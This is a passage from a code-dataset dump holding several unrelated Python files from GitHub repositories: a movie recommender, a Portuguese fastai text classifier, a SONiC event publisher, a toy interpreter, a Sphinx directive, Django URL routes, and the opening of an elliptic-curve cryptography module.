ks = [25, 30]\r\n learn_rates = [0.01, 0.001, 0.0001]\r\n\r\n for k in ks:\r\n P = np.random.normal(scale=1./k, size=(len(R), k))\r\n Q = np.random.normal(scale=1./k, size=(len(R[0]), k))\r\n b_u = np.zeros(len(R))\r\n b_i = np.zeros(len(R[0]))\r\n for lr in learn_rates:\r\n newP, newQ, newB_u, newB_i = matrix_factr(samples, R, P, Q, b, b_u, b_i, gamma=lr, rmse=True, bias=True)\r\n rmse_score = get_rmse(R, newP, newQ, b, newB_u, newB_i, bias=True)\r\n with open('grid_search.txt', 'a') as f:\r\n print(f\"k={k}, lr={lr}, rmse={rmse_score}\", file=f)\r\n\r\n\r\ndef plot_rmse(mse):\r\n \"\"\"\r\n Plots the mean squared error over all steps\r\n :param mse:\r\n :return:\r\n \"\"\"\r\n indeces = [i for i, j in mse]\r\n mses = [j for i, j in mse]\r\n with open('mse_bias_100s.txt', 'w') as f:\r\n print(mses, file=f)\r\n plt.figure(figsize=((16,4)))\r\n plt.plot(indeces, mses)\r\n plt.xticks(indeces, indeces)\r\n plt.xlabel(\"Steps\")\r\n plt.ylabel(\"RMSE\")\r\n plt.grid(axis=\"y\")\r\n filename = time.strftime(\"%Y%m%d-%H%M%S\")\r\n plt.savefig(filename + '.png')\r\n\r\n\r\ndef get_rmse(R, P, Q, b, b_u, b_i, bias):\r\n \"\"\"\r\n Computes total mean squared error\r\n :param R:\r\n :param P:\r\n :param Q:\r\n :return:\r\n \"\"\"\r\n i_indeces, j_indeces = R.nonzero()\r\n pred = predict_all(P, Q, b, b_u, b_i, bias) \r\n e = 0\r\n for i, j in zip(i_indeces, j_indeces):\r\n e += pow(R[i][j] - pred[i][j], 2)\r\n return np.sqrt(e/len(i_indeces))\r\n\r\n\r\ndef predict_single(i, j, P, Q, b, b_u, b_i, bias = False):\r\n \"\"\"\r\n Predicts the rating for a single user i and item j\r\n \"\"\"\r\n if bias:\r\n return (b + b_u[i] + b_i[j] + np.dot(P[i, :], Q[:, j]))\r\n else:\r\n return np.dot(P[i, :], Q[:, j])\r\n\r\n\r\ndef predict_all(P, Q, b, b_u, b_i, bias = False):\r\n \"\"\"\r\n Return the whole prediction matrix\r\n \"\"\"\r\n if bias:\r\n return b + b_u[:, np.newaxis] + b_i[np.newaxis:, ] + np.dot(P, Q)\r\n else:\r\n return np.dot(P, Q)\r\n\r\n\r\n#-----------------------------------------------ALS-----------------------------------------------------------\r\n\r\ndef als_step(R, update_matrix, fixed_matrix, k, gamma):\r\n \"\"\"\r\n In ALS we update one matrix while the other stays the same\r\n \"\"\"\r\n A = fixed_matrix.T.dot(fixed_matrix) + np.eye(k) * gamma\r\n b = R.dot(fixed_matrix)\r\n A_inv = np.linalg.inv(A)\r\n update_matrix = b.dot(A_inv)\r\n\r\n return update_matrix\r\n\r\n\r\ndef matrix_als(R, P, Q, k, steps=100, gamma=0.01, rmse = False, bias = False):\r\n \"\"\"\r\n Alternating Least Sqaures method for optimizing\r\n P and Q matrices.\r\n \"\"\"\r\n rmse_data = []\r\n rmse_old = get_rmse(R, P, Q.T, 0, [], [], False)\r\n\r\n for step in tqdm(range(steps)):\r\n Q[Q < 0] = 0\r\n P = als_step(R, P, Q, k, gamma)\r\n P[P < 0] = 0\r\n Q = als_step(R.T, Q, P, k, gamma)\r\n\r\n if rmse:\r\n rmse_new = get_rmse(R, P, Q.T, 0, [], [], False)\r\n print(rmse_new)\r\n # Check for convergence and break if new RMSE is bigger than old\r\n if np.abs(rmse_new - rmse_old) < 0.0001:\r\n rmse_data.append((step + 1, rmse_new))\r\n break\r\n else:\r\n rmse_data.append((step + 1, rmse_new))\r\n rmse_old = rmse_new\r\n if rmse:\r\n plot_rmse(rmse_data)\r\n\r\n return P, Q\r\n\r\n\r\n#-----------------------------------------------SDG-----------------------------------------------------------\r\n\r\n\r\ndef matrix_factr(samples, R, P, Q, b, b_u, b_i, steps=300, gamma=0.01, lamda=0.01, rmse = False, bias = False):\r\n '''\r\n R: Ratings matrix\r\n P: |users| * k - user feature matrix\r\n Q: |movies| * k - movie feature matrix\r\n ks: number of latent features we want\r\n steps: iterations\r\n gamma: learning rate\r\n lamda: regularization rate - bigger rate means less overfitting\r\n '''\r\n\r\n Q = Q.T\r\n rmse_data = []\r\n rmse_old = get_rmse(R, P, Q, b, b_u, b_i, bias)\r\n rmse_data.append((0, rmse_old))\r\n\r\n for step in tqdm(range(steps)):\r\n np.random.shuffle(samples)\r\n for i, j, r in samples:\r\n # Error calculation\r\n e = r - predict_single(i, j, P, Q, b, b_u, b_i, bias)\r\n # Bias calculation\r\n if bias:\r\n b_u[i] += gamma * (e - lamda * b_u[i])\r\n b_i[j] += gamma * (e - lamda * b_i[j])\r\n # Gradient calculation\r\n p_old = P[i, :][:]\r\n P[i,:] += gamma * (e * Q[:,j] - lamda * P[i,:])\r\n Q[:,j] += gamma * (e * p_old - lamda * Q[:,j])\r\n\r\n if (step + 1) % 10 == 0 and rmse:\r\n rmse_new = get_rmse(R, P, Q, b, b_u, b_i, bias)\r\n # Check for convergence and break if new RMSE is bigger than old\r\n if np.abs(rmse_new - rmse_old) < 0.0001:\r\n rmse_data.append((step + 1, rmse_new))\r\n break\r\n else:\r\n rmse_data.append((step + 1, rmse_new))\r\n rmse_old = rmse_new\r\n if rmse:\r\n plot_rmse(rmse_data)\r\n\r\n return P, Q, b_u, b_i\r\n\r\n#-----------------------------------------------Prediction functions for LF-----------------------------------------------------------\r\n\r\n\r\ndef predict_latent_factors_with_bias(movies, users, ratings, predictions):\r\n # R: Ratings matrix\r\n R = ratings.to_numpy()\r\n # n: number of users\r\n n = len(R)\r\n # m: number of movies\r\n m = len(R[0])\r\n # k: number of features\r\n k = 25\r\n # bias: do we want to include bias in our computation\r\n bias_value = True\r\n\r\n # Initialise random P and Q matrices\r\n P = np.random.normal(scale=1./k, size=(n, k))\r\n Q = np.random.normal(scale=1./k, size=(m, k))\r\n\r\n # Initialise biases\r\n b = np.mean(R[np.where(R != 0)])\r\n b_u = np.zeros(n)\r\n b_i = np.zeros(m)\r\n\r\n # Throw away 0 rated entries once instead\r\n # of checking every step if R[i][j] is 0\r\n samples = [\r\n (i, j, R[i, j])\r\n for i in range(n)\r\n for j in range(m)\r\n if R[i][j] > 0\r\n ]\r\n\r\n newP, newQ, newB_u, newB_i = matrix_factr(samples, R, P, Q, b, b_u, b_i, rmse=True, bias=bias_value)\r\n # newP, newQ = matrix_als(R, P, Q, k, rmse=True, bias=bias_value)\r\n\r\n newR = predict_all(newP, newQ, b, newB_u, newB_i, bias=bias_value)\r\n # newR = predict_all(newP, newQ.T, b, b_u, b_i)\r\n\r\n number_predictions = len(predictions)\r\n result = [[idx+1, newR[predictions.movieID[idx]-1, predictions.userID[idx]-1]] for idx in range(0, number_predictions)]\r\n return result\r\n\r\n\r\ndef predict_latent_factors_no_bias(movies, users, ratings, predictions):\r\n # R: Ratings matrix\r\n R = ratings.to_numpy()\r\n # n: number of users\r\n n = len(R)\r\n # m: number of movies\r\n m = len(R[0])\r\n # k: number of features\r\n k = 25\r\n # bias: do we want to include bias in our computation\r\n bias_value = False\r\n\r\n # Initialise random P and Q matrices\r\n P = np.random.normal(scale=1./k, size=(n, k))\r\n Q = np.random.normal(scale=1./k, size=(m, k))\r\n\r\n # Initialise biases\r\n b = np.mean(R[np.where(R != 0)])\r\n b_u = np.zeros(n)\r\n b_i = np.zeros(m)\r\n\r\n # Throw away 0 rated entries once instead\r\n # of checking every step if R[i][j] is 0\r\n samples = [\r\n (i, j, R[i, j])\r\n for i in range(n)\r\n for j in range(m)\r\n if R[i][j] > 0\r\n ]\r\n\r\n newP, newQ, newB_u, newB_i = matrix_factr(samples, R, P, Q, b, b_u, b_i, rmse=True, bias=bias_value)\r\n newR = predict_all(newP, newQ, b, newB_u, newB_i, bias=bias_value)\r\n\r\n number_predictions = len(predictions)\r\n result = [[idx+1, newR[predictions.movieID[idx]-1, predictions.userID[idx]-1]] for idx in range(0, number_predictions)]\r\n return result\r\n\r\n\r\ndef predict_latent_factors_ALS(movies, users, ratings, predictions):\r\n # R: Ratings matrix\r\n R = ratings.to_numpy()\r\n # n: number of users\r\n n = len(R)\r\n # m: number of movies\r\n m = len(R[0])\r\n # k: number of features\r\n k = 25\r\n # bias: do we want to include bias in our computation\r\n\r\n # Initialise random P and Q matrices\r\n P = np.random.normal(scale=1./k, size=(n, k))\r\n Q = np.random.normal(scale=1./k, size=(m, k))\r\n\r\n newP, newQ = matrix_als(R, P, Q, k, rmse=True)\r\n\r\n newR = predict_all(newP, newQ.T, b, b_u, b_i)\r\n\r\n number_predictions = len(predictions)\r\n result = [[idx+1, newR[predictions.movieID[idx]-1, predictions.userID[idx]-1]] for idx in range(0, number_predictions)]\r\n return result\r\n\r\n#####\r\n##\r\n# FINAL PREDICTORS\r\n##\r\n#####\r\n\r\n\r\ndef predict_final(movies, users, ratings, predictions):\r\n # TO COMPLETE\r\n\r\n pass\r\n\r\n\r\n\r\n#####\r\n##\r\n# SAVE RESULTS\r\n##\r\n##### \r\n\r\n\r\n# //!!\\\\ TO CHANGE by your prediction function\r\npredictions = predict_latent_factors_with_bias(movies_description, users_description, ratings, predictions_description)\r\n\r\n# Save predictions, should be in the form 'list of tuples' or 'list of lists'\r\nwith open(submission_file, 'w') as submission_writer:\r\n # Formates data\r\n predictions = [map(str, row) for row in predictions]\r\n predictions = [','.join(row) for row in predictions]\r\n predictions = 'Id,Rating\\n' + '\\n'.join(predictions)\r\n\r\n # Writes it dowmn\r\n submission_writer.write(predictions)\r\n","repo_name":"balysMorkunas/movie-recommender-system","sub_path":"mrs/main/step1-recommender-systems.py","file_name":"step1-recommender-systems.py","file_ext":"py","file_size_in_byte":15816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"30609223714","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nget_ipython().run_line_magic('matplotlib', 'inline')\nfrom pathlib import Path\nimport seaborn as sns\nfrom fastai.text import *\nfrom fastai import __version__\n\n\n# In[2]:\n\n\nprint(\"Python version: {}\". format(sys.version))\nprint(\"seaborn version: {}\". format(sns.__version__))\nprint(\"fastai version: {}\". format(__version__))\n\n\n# # Preparando os dados\n\n# In[3]:\n\n\n# setando o path para os dados\npath = Path('./data')\n\n\n# In[ ]:\n\n\ndf = pd.read_csv(path/'treinamento.csv', encoding = 'ISO-8859-1')\n\n\n# In[ ]:\n\n\ndf.shape\n\n\n# In[ ]:\n\n\ndf.isnull().sum()\n\n\n# In[ ]:\n\n\ndf.head()\n\n\n# In[ ]:\n\n\ndf['categoria'].value_counts()\n\n\n# In[ ]:\n\n\nsns.set(style=\"darkgrid\")\nax = sns.countplot(x=\"categoria\", data=df)\nplt.show()\n\n\n# In[ ]:\n\n\ndf.to_csv(path/'treinamento_utf-8.csv', encoding = 'utf-8')\n\n\n# ### Criação de um objeto \"Databunch\" para realizar \"Tokenization\" e \"Numericalization\" dos dados.\n\n# In[ ]:\n\n\ndata = TextDataBunch.from_csv(path, 'treinamento_utf-8.csv', text_cols='mensagem', label_cols='categoria')\n\n\n# ### Tokenization\n\n# In[ ]:\n\n\ndata.show_batch()\n\n\n# In[ ]:\n\n\ndata.train_ds[0][0]\n\n\n# ### Numericalization\n\n# In[ ]:\n\n\ndata.vocab.itos[:18]\n\n\n# In[ ]:\n\n\ndata.train_ds[0][0].data[:10]\n\n\n# # Modelo de Linguagem\n\n# In[5]:\n\n\nbs=48\n\n\n# In[ ]:\n\n\ntokenizer = Tokenizer(SpacyTokenizer, 'pt')\nprocessor = [TokenizeProcessor(tokenizer=tokenizer), NumericalizeProcessor(max_vocab=30000)]\n\n\n# ### Criando o DataBunch \n\n# In[ ]:\n\n\ndata_lm = (TextList.from_csv(path, 'treinamento_utf-8.csv', cols='mensagem', processor=processor) \n .split_by_rand_pct(0.1, seed=50) #Dividindo randomicamente o dataset em 10% para validação\n .label_for_lm() ##Setando a coluna de label\n .databunch(bs=bs))\ndata_lm.save('data_lm.pkl')\n\n\n# In[6]:\n\n\ndata_lm = load_data(path, 'data_lm.pkl', bs=bs)\n\n\n# In[10]:\n\n\ndata_lm.show_batch()\n\n\n# ### Criando o modelo de linguagem\n# \n# A partir de um modelo de linguagem \"pré-treinado\", será criado um modelo customizado para as mensagens.\n\n# In[ ]:\n\n\n# Nomes dos arquivos de modelo e vocabulário pré-treinado\npretrained_fnames = ('lm_Pt_Br_30kt_ft', 'itos')\nlearn = language_model_learner(data_lm, AWD_LSTM, pretrained_fnames=pretrained_fnames, drop_mult=0.3)\n\n\n# In[12]:\n\n\nlearn.lr_find()\n\n\n# In[13]:\n\n\nlearn.recorder.plot(skip_end=3)\n\n\n# ### Treinando o modelo \n\n# In[14]:\n\n\nlearn.fit_one_cycle(1, 1e-1, moms=(0.8,0.7))\n\n\n# In[ ]:\n\n\nlearn.unfreeze()\n\n\n# In[16]:\n\n\nlearn.fit_one_cycle(10, 1e-2, moms=(0.8,0.7))\n\n\n# In[ ]:\n\n\nlearn.save('lm_reviews_ft')\n\n\n# In[ ]:\n\n\nlearn.load('lm_reviews_ft');\n\n\n# ### Testando o modelo\n# \n# Testando as previsões realizadas pelo modelo de próximas palavras de um texto inserido.\n\n# In[ ]:\n\n\nTEXT = \"Depois de realizar\"\nN_WORDS = 18\n\n\n# In[22]:\n\n\nlearn.predict(TEXT, N_WORDS, temperature=0.75)\n\n\n# ### Salvando o encoder para utilização no classificador\n\n# In[ ]:\n\n\nlearn.save_encoder('lm_reviews_ft_enc')\n\n\n# # Classificador\n\n# In[ ]:\n\n\nbs=48\n\n\n# In[ ]:\n\n\ntokenizer = Tokenizer(SpacyTokenizer, 'pt')\nprocessor = [TokenizeProcessor(tokenizer=tokenizer), NumericalizeProcessor(max_vocab=30000)]\n\n\n# In[ ]:\n\n\ndata_clas = (TextList.from_csv(path, 'treinamento_utf-8.csv', cols='mensagem', vocab=data_lm.vocab, processor=processor) \n .split_by_rand_pct(0.1, seed=50) #Dividindo randomicamente o dataset em 10% para validação\n .label_from_df(cols='categoria') #Setando a coluna de label \n .databunch(bs=bs))\ndata_clas.save('data_clas.pkl')\n\n\n# In[7]:\n\n\ndata_clas = load_data(path, 'data_clas.pkl', bs=bs)\n\n\n# In[79]:\n\n\ndata_clas.show_batch()\n\n\n# ### Criando o modelo\n# \n# Criando o modelo para classificação das mensagens e carregando o encoder salvo anteriormente.\n\n# In[39]:\n\n\nwgts_fname = path/'models'/'lm_Pt_Br_30kt_ft.pth'\nitos_fname = path/'models'/'itos.pkl'\n\nmodel = get_text_classifier(AWD_LSTM, len(data_clas.vocab.itos), data_clas.c, drop_mult=0.5)\nlearn = RNNLearner(data_clas, model, split_func=awd_lstm_clas_split) \nlearn.load_pretrained(wgts_fname, itos_fname, strict=False)\nlearn.freeze()\n\n\n# In[40]:\n\n\nlearn.load_encoder('lm_reviews_ft_enc')\n\n\n# In[20]:\n\n\nlearn.lr_find()\n\n\n# In[21]:\n\n\nlearn.recorder.plot()\n\n\n# In[22]:\n\n\nlr=2e-2\nlr *= bs/48\n\n\n# ### Treinando o modelo\n\n# In[23]:\n\n\nlearn.fit_one_cycle(2, lr, moms=(0.8,0.7))\n\n\n# In[24]:\n\n\nlearn.freeze_to(-2)\nlearn.fit_one_cycle(2, slice(lr/(2.6**4),lr), moms=(0.8,0.7))\n\n\n# In[27]:\n\n\nlearn.freeze_to(-3)\nlearn.fit_one_cycle(2, slice(lr/2/(2.6**4),lr/2), moms=(0.8,0.7))\n\n\n# In[42]:\n\n\nlearn.unfreeze()\nlearn.fit_one_cycle(1, slice(lr/10/(2.6**4),lr/10), moms=(0.8,0.7))\n\n\n# #### Salvando o modelo com acurácia de 91%.\n\n# In[43]:\n\n\nlearn.save('clas_reviews_ft')\n\n\n# ### Testando o modelo \n# \n# Testando a classificação realizada pelo modelo de uma mensagem inserida. \n\n# In[48]:\n\n\nlearn.predict(\"O atendimento foi muito bom\")\n\n","repo_name":"castortroynz/desafio_atuacao19","sub_path":"desafio_atuacao19.py","file_name":"desafio_atuacao19.py","file_ext":"py","file_size_in_byte":4914,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"39129123614","text":"from swsscommon.swsscommon import events_init_publisher, events_deinit_publisher, event_publish, FieldValueMap\nimport time\nimport sys\nimport ipaddress\nimport random\nimport argparse\nimport json\nimport logging\n\nlogging.basicConfig(\n level=logging.INFO,\n format=\"%(asctime)s [%(levelname)s] %(message)s\",\n handlers = [\n logging.FileHandler(\"debug.log\"),\n logging.StreamHandler(sys.stdout)\n ]\n)\n\ndef getTag(sourceTag):\n try:\n return sourceTag.split(\":\", 1)[1]\n except Exception as ex:\n logging.info(\"Unable to find : in :tag\\n\")\n return sourceTag\n\ndef getFVMFromParams(params):\n param_dict = FieldValueMap()\n for key, value in params.items():\n key = str(key)\n value = str(value)\n param_dict[key] = value\n return param_dict\n\ndef publishEvents(line, publisher_handle):\n try:\n json_dict = json.loads(line)\n except Exception as ex:\n logging.error(\"JSON string not able to be parsed\\n\")\n return\n if not json_dict or len(json_dict) != 1:\n logging.error(\"JSON string not able to be parsed\\n\")\n return\n sourceTag = list(json_dict)[0]\n params = list(json_dict.values())[0]\n tag = getTag(sourceTag)\n param_dict = getFVMFromParams(params)\n if param_dict:\n event_publish(publisher_handle, tag, param_dict)\n\ndef publishEventsFromFile(publisher_handle, infile, count, pause):\n try:\n with open(infile, 'r') as f:\n for line in f.readlines():\n line.rstrip()\n publishEvents(line, publisher_handle)\n time.sleep(pause)\n except Exception as ex:\n logging.error(\"Unable to open file from given path or has incorrect json format, gives exception {}\\n\".format(ex))\n logging.info(\"Switching to default bgp state publish events\\n\")\n publishBGPEvents(publisher_handle, count, pause)\n\ndef publishBGPEvents(publisher_handle, count, pause):\n ip_addresses = []\n param_dict = FieldValueMap()\n\n for _ in range(count):\n ip = str(ipaddress.IPv4Address(random.randint(0, 2 ** 32)))\n ip_addresses.append(ip)\n\n # publish down events\n for ip in ip_addresses:\n param_dict[\"ip\"] = ip\n param_dict[\"status\"] = \"down\"\n event_publish(publisher_handle, \"bgp-state\", param_dict)\n time.sleep(pause)\n\n # publish up events\n for ip in ip_addresses:\n param_dict[\"ip\"] = ip\n event_publish(publisher_handle, \"bgp-state\", param_dict)\n time.sleep(pause)\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-s\", \"--source\", nargs='?', const='test-event-source', default='test-event-source', help=\"Source of event, default us test-event-source\")\n parser.add_argument(\"-f\", \"--file\", nargs='?', const='', default='', help=\"File containing json event strings, must be in format \\'{\\\":foo\\\": {\\\"aaa\\\": \\\"AAA\\\", \\\"bbb\\\": \\\"BBB\\\"}}\\'\")\n parser.add_argument(\"-c\", \"--count\", nargs='?', type=int, const=10, default=10, help=\"Count of default bgp events to be generated\")\n parser.add_argument(\"-p\", \"--pause\", nargs='?', type=float, const=0.0, default=0.0, help=\"Pause time wanted between each event, default is 0\")\n args = parser.parse_args()\n publisher_handle = events_init_publisher(args.source)\n if args.file == '':\n publishBGPEvents(publisher_handle, args.count, args.pause)\n else:\n publishEventsFromFile(publisher_handle, args.file, args.count, args.pause)\n events_deinit_publisher(publisher_handle)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"sonic-net/sonic-buildimage","sub_path":"src/sonic-eventd/tools/events_publish_tool.py","file_name":"events_publish_tool.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","stars":614,"dataset":"github-code","pt":"60"} +{"seq_id":"16423317654","text":"\n\n\ndef main(text) :\n\tstmt, lbl, text = preprocess(text)\n\tprint(evaluate(stmt, lbl, text))\n\nfrom itertools import chain\ndef preprocess(lines) :\n\tstatements = []\n\tlabels = {}\n\toutput\t = []\n\tfor line in lines :\n\t\tif \":\" in line :\n\t\t\tcolon = line.index(\":\")\n\t\t\tlabel = line[:colon].strip()\n\t\t\tlabels[label] = len(statements)\n\t\t\tline = line[colon+1:].strip()\n\t\tif not line.strip() :\n\t\t\tcontinue\n\n\t\tif \"include\" in line :\n\t\t\tpos = line.index(\"include\") + 7\n\t\t\twith open(line[7:].strip(), \"r\") as file :\n\t\t\t\tsts, lbs, txs = preprocess(file.readlines())\n\t\t\tstatements += sts\n\t\t\tfor k, v in lbs.items() :\n\t\t\t\tlabels[k] = v\n\t\t\toutput += txs\n\t\telif \"<-\" in line :\n\t\t\tarrow = line.index(\"<-\")\n\t\t\tdestination = line[:arrow].strip()\n\t\t\tsource = expression(line[arrow+2:].strip())\n\t\t\tstatements.append( (\"assignment\", destination, source) )\n\t\telif \"exit\" in line :\n\t\t\tret = line.index(\"exit\")\n\t\t\treturned = line[ret+4:].strip()\n\t\t\tstatements.append( (\"exit\", returned) )\n\t\telif \"goto\" in line :\n\t\t\tgoto = line.index(\"goto\")\n\t\t\tdestination = line[goto+4:].strip()\n\t\t\tstatements.append( (\"goto\", destination) )\n\t\telif \"if\" in line :\n\t\t\tscrutinee, dest = line.strip()[2:].split()\n\t\t\tstatements.append( (\"if\", scrutinee, dest) )\n\t\telif \"unless\" in line :\n\t\t\tscrutinee, dest = line.strip()[6:].split()\n\t\t\tstatements.append( (\"unless\", scrutinee, dest) )\n\t\telif \"push\" in line :\n\t\t\tvar = line.strip()[4:].strip()\n\t\t\tstatements.append( (\"push\", var) )\n\t\telif \"pop\" in line :\n\t\t\tvar = line.strip()[3:].strip()\n\t\t\tstatements.append( (\"pop\", var) )\n\t\telif \"call\" in line :\n\t\t\tfunc = line.strip()[4:].strip()\n\t\t\tstatements.append( (\"call\", func) )\n\t\telif \"return\" in line :\n\t\t\treturned = line.strip()[6:].strip()\n\t\t\tstatements.append( (\"return\", returned) )\n\t\toutput.append(line)\n\treturn statements , labels, output\n\nbinops = \"+-*/=\"\ndef expression(expr) :\n\tfor op in binops :\n\t\tif op in expr :\n\t\t\tpos = expr.index(op)\n\t\t\trand1 = expr[:pos].strip()\n\t\t\trand2 = expr[pos+1:].strip()\n\t\t\treturn (op, rand1, rand2)\n\tif expr.isnumeric() :\n\t\treturn (\"constant\", int(expr))\n\telif expr.strip() in [\"false\", \"true\"] :\n\t\treturn (\"constant\", eval(expr))\n\telse :\n\t\treturn (\"variable\", expr)\n\n\ndef evaluate(statements, labels, text, env={}, stack=[]) :\n\tpc = 0\n\twhile True :\n\t\tinst = statements[pc]\n\t\tprint(\"[\" + str(pc) + \"]\\t\" + text[pc].strip().ljust(20) + str(stack).ljust(10) + str(env))\n\n\t\ttype = inst[0]\n\t\tif type == \"exit\" :\n\t\t\treturn env[inst[1]]\n\t\telif type == \"assignment\" :\n\t\t\tlhs, rhs = inst[1], inst[2]\n\t\t\tif rhs[0] == \"constant\" :\n\t\t\t\tenv[lhs] = rhs[1]\n\t\t\telif rhs[0] == \"variable\" :\n\t\t\t\tenv[lhs] = env[rhs]\n\t\t\telif rhs[0] == \"+\" :\n\t\t\t\tenv[lhs] = env[rhs[1]] + env[rhs[2]]\n\t\t\telif rhs[0] == \"-\" :\n\t\t\t\tenv[lhs] = env[rhs[1]] - env[rhs[2]]\n\t\t\telif rhs[0] == \"=\" :\n\t\t\t\tenv[lhs] = env[rhs[1]] == env[rhs[2]]\n\t\t\tpc += 1\n\t\telif type == \"goto\" :\n\t\t\tpc = labels[inst[1]]\n\t\telif type == \"if\" :\n\t\t\tif env[inst[1]] :\n\t\t\t\tpc = labels[inst[2]]\n\t\t\telse :\n\t\t\t\tpc += 1\n\t\telif type == \"unless\" :\n\t\t\tif env[inst[1]] :\n\t\t\t\tpc += 1\n\t\t\telse :\n\t\t\t\tpc = labels[inst[2]]\n\t\telif type == \"pop\" :\n\t\t\tenv[inst[1]] = stack.pop()\n\t\t\tpc += 1\n\t\telif type == \"push\" :\n\t\t\tstack.append( env[inst[1]] )\n\t\t\tpc += 1\n\t\telif type == \"call\" :\n\t\t\tstack.append( pc+1 )\n\t\t\tpc = labels[inst[1]]\n\t\telif type == \"return\" :\n\t\t\tpc = stack.pop()\n\t\t\tstack.append( env[inst[1]] )\n\t\telse :\n\t\t\traise Exception(\"OMG\" + str(inst))\n\n\ndef getInput() :\n\ttext = []\n\tline = 0\n\twhile True :\n\t\tinp = input(str(line) + \"\\t\")\n\t\tif inp :\n\t\t\tline += 1\n\t\t\ttext.append(inp)\n\t\telse :\n\t\t\tbreak\n\treturn text\n\nimport sys\nif __name__ == \"__main__\" :\n\targv = sys.argv\n\tif \"-f\" in argv :\n\t\tpos = argv.index(\"-f\") + 1\n\t\twith open(argv[pos], \"r\") as file :\n\t\t\tsample = file.readlines()\n\telse :\n\t\tsample = getInput()\n\tmain(sample)\n","repo_name":"simonl/assm","sub_path":"compiler/toyimperative.py","file_name":"toyimperative.py","file_ext":"py","file_size_in_byte":3738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"36433350715","text":"from typing import Any, Dict, List, Sequence\n\n# 3rd party\nimport sphinx.environment\nfrom docutils import nodes\nfrom docutils.parsers.rst import directives\nfrom docutils.statemachine import ViewList\nfrom domdf_python_tools.stringlist import StringList\nfrom sphinx.application import Sphinx\nfrom sphinx.util.docutils import SphinxDirective\n\n# this package\nfrom sphinx_toolbox.utils import OptionSpec, Purger, SphinxExtMetadata, metadata_add_version\n\n__all__ = (\"reSTExampleDirective\", \"make_rest_example\", \"rest_example_purger\", \"setup\")\n\n\nclass reSTExampleDirective(SphinxDirective):\n\t\"\"\"\n\tDirective to show some reStructuredText source, and the rendered output.\n\t\"\"\"\n\n\thas_content: bool = True\n\n\t# Options to pass through to .. code-block::\n\toption_spec: OptionSpec = { # type: ignore[assignment]\n\t\t\"force\": directives.flag,\n\t\t\"emphasize-lines\": directives.unchanged,\n\t\t\"tab-width\": int,\n\t\t\"dedent\": int,\n\t\t}\n\n\tdef run(self) -> List[nodes.Node]:\n\t\t\"\"\"\n\t\tCreate the rest_example node.\n\t\t\"\"\"\n\n\t\ttargetid = f'example-{self.env.new_serialno(\"sphinx-toolbox rest_example\"):d}'\n\t\ttargetnode = nodes.target('', '', ids=[targetid])\n\n\t\tcontent = make_rest_example(\n\t\t\t\tself.options,\n\t\t\t\tself.env,\n\t\t\t\tself.content, # type: ignore[arg-type]\n\t\t\t\t)\n\t\tview = ViewList(content)\n\n\t\texample_node = nodes.paragraph(rawsource=content) # type: ignore[arg-type]\n\t\tself.state.nested_parse(view, self.content_offset, example_node) # type: ignore[arg-type]\n\n\t\trest_example_purger.add_node(self.env, example_node, targetnode, self.lineno)\n\n\t\treturn [targetnode, example_node]\n\n\ndef make_rest_example(\n\t\toptions: Dict[str, Any],\n\t\tenv: sphinx.environment.BuildEnvironment,\n\t\tcontent: Sequence[str],\n\t\t) -> List[str]:\n\t\"\"\"\n\tMake the content of a reST Example node.\n\n\t:param options:\n\t:param content: The user-provided content of the directive.\n\t\"\"\"\n\n\toutput = StringList(\".. container:: rest-example\")\n\toutput.indent_type = ' ' * env.config.docutils_tab_width\n\n\toutput.blankline()\n\n\twith output.with_indent_size(1):\n\n\t\toutput.append(\".. code-block:: rest\")\n\n\t\twith output.with_indent_size(2):\n\t\t\tfor option, value in options.items():\n\t\t\t\tif value is None:\n\t\t\t\t\toutput.append(f\":{option}:\")\n\t\t\t\telse:\n\t\t\t\t\toutput.append(f\":{option}: {value}\")\n\n\t\t\toutput.blankline()\n\t\t\toutput.extend(content)\n\n\t\toutput.blankline(ensure_single=True)\n\t\toutput.extend(content)\n\t\toutput.blankline(ensure_single=True)\n\n\treturn list(output)\n\n\n#: Purger to track rest-example nodes, and remove redundant ones.\nrest_example_purger = Purger(\"all_rest_example_nodes\")\n\n\n@metadata_add_version\ndef setup(app: Sphinx) -> SphinxExtMetadata:\n\t\"\"\"\n\tSetup :mod:`sphinx_toolbox.rest_example`.\n\n\t.. versionadded:: 0.7.0\n\n\t:param app: The Sphinx application.\n\t\"\"\"\n\n\t# Hack to get the docutils tab size, as there doesn't appear to be any other way\n\tapp.setup_extension(\"sphinx_toolbox.tweaks.tabsize\")\n\tapp.setup_extension(\"sphinx_toolbox._css\")\n\n\tapp.add_directive(\"rest-example\", reSTExampleDirective)\n\tapp.connect(\"env-purge-doc\", rest_example_purger.purge_nodes)\n\n\treturn {\"parallel_read_safe\": True}\n","repo_name":"sphinx-toolbox/sphinx-toolbox","sub_path":"sphinx_toolbox/rest_example.py","file_name":"rest_example.py","file_ext":"py","file_size_in_byte":3044,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"60"} +{"seq_id":"9322691598","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n\n # Home\n path(\"\", views.index, name=\"home\"),\n # GET -> get home page\n\n path(\"login\", views.login, name=\"login\"), \n # GET -> gets login page \n # POST -> authenticates login attempt\n\n \n path(\"registration\", views.registration, name=\"registration\"), \n # GET -> gets registration page\n # POST -> authenticates registration attempt\n path(\"logout\", views.logout, name=\"logout\"),\n # POST -> destroys session\n\n # Users\n path(\"users\", views.users, name=\"users\"),\n # GET -> gets users page (dashboard)\n\n path(\"user/\", views.user, name=\"user\"),\n # GET -> gets user profile\n # POST -> handles user profile edits\n]","repo_name":"John-W-Stevens/user_dashboard_2.0","sub_path":"users_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"6738553855","text":"import random\n\n\n\"\"\"\nImplementation of Elliptic Curve Cryptography (ECC) over finite fields.\n\nHuge thanks to Andrea Corbellini for his excellent blog post on 